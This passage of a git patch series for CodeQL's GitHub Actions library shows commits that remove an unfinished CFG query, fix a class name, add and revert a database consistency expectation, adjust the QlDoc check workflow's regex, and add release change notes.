SplitKindBase = TUnit; - class Split extends TUnit { + additional class Split extends TUnit { abstract string toString(); } @@ -115,7 +115,7 @@ private module Implementation implements CfgShared::InputSig { ) } - int maxSplits() { result = 0 } + additional int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(Workflow), e) or From a66ba4ebaec11af3faf0aaf50e89a63187793b4f Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 16:11:54 -0500 Subject: [PATCH 701/707] Remove `printCfg.ql` This file not yet fully implemented and does not compile --- .../ql/lib/ide-contextual-queries/printCfg.ql | 53 ------------------- 1 file changed, 53 deletions(-) delete mode 100644 actions/ql/lib/ide-contextual-queries/printCfg.ql diff --git a/actions/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql deleted file mode 100644 index 4f4d76f5f13c..000000000000 --- a/actions/ql/lib/ide-contextual-queries/printCfg.ql +++ /dev/null @@ -1,53 +0,0 @@ -/** - * @name Print CFG - * @description Produces a representation of a file's Control Flow Graph. - * This query is used by the VS Code extension. - * @id actions/print-cfg - * @kind graph - * @tags ide-contextual-queries/print-cfg - */ - -private import codeql.actions.Cfg -private import codeql.actions.Cfg::TestOutput -private import codeql.actions.ideContextual.IDEContextual -private import codeql.Locations - -/** - * Gets the source file to generate a CFG from. - */ -external string selectedSourceFile(); - -external string selectedSourceLine(); - -external string selectedSourceColumn(); - -bindingset[file, line, column] -private CfgScope smallestEnclosingScope(File file, int line, int column) { - result = - min(Location loc, CfgScope scope | - loc = scope.getLocation() and - ( - loc.getStartLine() < line - or - loc.getStartLine() = line and loc.getStartColumn() <= column - ) and - ( - loc.getEndLine() > line - or - loc.getEndLine() = line and loc.getEndColumn() >= column - ) and - loc.getFile() = file - | - scope - order by - loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn() - ) -} - -class MyRelevantNode extends RelevantNode { - MyRelevantNode() { - this.getScope() = - smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()), - selectedSourceLine().toInt(), selectedSourceColumn().toInt()) - } -} From 4743dfa601ebde50d0ee822276c327e2ae6a0494 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 16:22:37 -0500 Subject: [PATCH 702/707] Fix result of `getAPrimaryQlClass()` --- actions/ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll index 77d2bcef3cdf..b0cbb8a1d79e 100644 --- a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -273,7 +273,7 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { override ScalarValueImpl getParentNode() { result.getNode() = value } - override string getAPrimaryQlClass() { result = "ExpressionNode" } + override string getAPrimaryQlClass() { result = "ExpressionImpl" } override YamlNode getNode() { none() } From dba6f0bb9f95e4fc18d4f2a319d296ab68f5a278 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 16:54:34 -0500 Subject: [PATCH 703/707] Accept DB consistency check for now Failure tracked in https://github.com/github/codeql-team/issues/3655 --- actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected diff --git a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected new file mode 100644 index 000000000000..8ad775c8995f --- /dev/null +++ b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected @@ -0,0 +1,5 @@ +[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777215,0,-16777216,1,"tag:yaml.org,2002:bool","on") +[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777214,0,-16777216,-1,"tag:yaml.org,2002:str","pull_request_target") +[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777213,0,-16777216,2,"tag:yaml.org,2002:str","jobs") +[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777211,0,-16777212,1,"tag:yaml.org,2002:str","test") +[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777210,1,-16777212,-1,"tag:yaml.org,2002:map","runs-on ... -latest") From 9b9df4c7e018dd74ce878b1e86db8c78528c153e Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 17:02:02 -0500 Subject: [PATCH 704/707] Temporarily disable QlDoc checks for Actions https://github.com/github/codeql-team/issues/3656 --- .github/workflows/check-qldoc.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml index e64d661c7911..0cb72ed8e147 100644 --- a/.github/workflows/check-qldoc.yml +++ b/.github/workflows/check-qldoc.yml @@ -30,7 +30,8 @@ jobs: run: | EXIT_CODE=0 # TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported - changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared))[a-z]*/ql/lib' || true; } | sort -u)" + # TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed + changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!0(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)" for pack_dir in ${changed_lib_packs}; do lang="${pack_dir%/ql/lib}" codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}" From 8b132274b574cd2f6eb87869a392e455d737b369 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 19 Dec 2024 09:47:42 -0500 Subject: [PATCH 705/707] Revert "Accept DB consistency check for now" This reverts commit dba6f0bb9f95e4fc18d4f2a319d296ab68f5a278. --- actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected | 5 ----- 1 file changed, 5 deletions(-) delete mode 100644 actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected diff --git a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected deleted file mode 100644 index 8ad775c8995f..000000000000 --- a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected +++ /dev/null @@ -1,5 +0,0 @@ -[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777215,0,-16777216,1,"tag:yaml.org,2002:bool","on") -[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777214,0,-16777216,-1,"tag:yaml.org,2002:str","pull_request_target") -[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777213,0,-16777216,2,"tag:yaml.org,2002:str","jobs") -[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777211,0,-16777212,1,"tag:yaml.org,2002:str","test") -[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777210,1,-16777212,-1,"tag:yaml.org,2002:map","runs-on ... -latest") From bfa105fc0d02579534730c75e990d49fbaeeeb91 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 19 Dec 2024 10:00:20 -0500 Subject: [PATCH 706/707] Fix typo --- .github/workflows/check-qldoc.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml index 0cb72ed8e147..f10e0dc90b99 100644 --- a/.github/workflows/check-qldoc.yml +++ b/.github/workflows/check-qldoc.yml @@ -31,7 +31,7 @@ jobs: EXIT_CODE=0 # TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported # TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed - changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!0(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)" + changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)" for pack_dir in ${changed_lib_packs}; do lang="${pack_dir%/ql/lib}" codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}" From e4bce701a0de2b2637e917c8ff26719d37fc0c35 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 19 Dec 2024 10:53:23 -0500 Subject: [PATCH 707/707] Add change notes --- actions/ql/lib/change-notes/2024-12-19-initial-release.md | 4 ++++ actions/ql/src/change-notes/2024-12-19-initial-release.md | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 actions/ql/lib/change-notes/2024-12-19-initial-release.md create mode 100644 actions/ql/src/change-notes/2024-12-19-initial-release.md diff --git a/actions/ql/lib/change-notes/2024-12-19-initial-release.md b/actions/ql/lib/change-notes/2024-12-19-initial-release.md new file mode 100644 index 000000000000..09263f5089d2 --- /dev/null +++ b/actions/ql/lib/change-notes/2024-12-19-initial-release.md @@ -0,0 +1,4 @@ +--- +category: feature +--- +* Initial public preview release diff --git a/actions/ql/src/change-notes/2024-12-19-initial-release.md b/actions/ql/src/change-notes/2024-12-19-initial-release.md new file mode 100644 index 000000000000..e02078ea2731 --- /dev/null +++ b/actions/ql/src/change-notes/2024-12-19-initial-release.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Initial public preview release